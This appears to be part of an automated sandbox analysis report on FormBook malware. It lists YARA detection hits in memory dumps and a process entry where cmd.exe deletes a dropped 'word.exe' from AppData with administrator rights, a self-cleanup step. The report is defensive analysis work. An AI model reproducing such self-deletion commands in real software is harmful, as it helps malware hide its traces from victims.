                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Analysis Process: cmd.exe PID: 1292 Parent PID: 2980

                                            General

                                            Start time:08:06:12
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\user\AppData\Roaming\word.exe"
                                            Imagebase:0x4ace0000
                                            File size:302592 bytes
                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >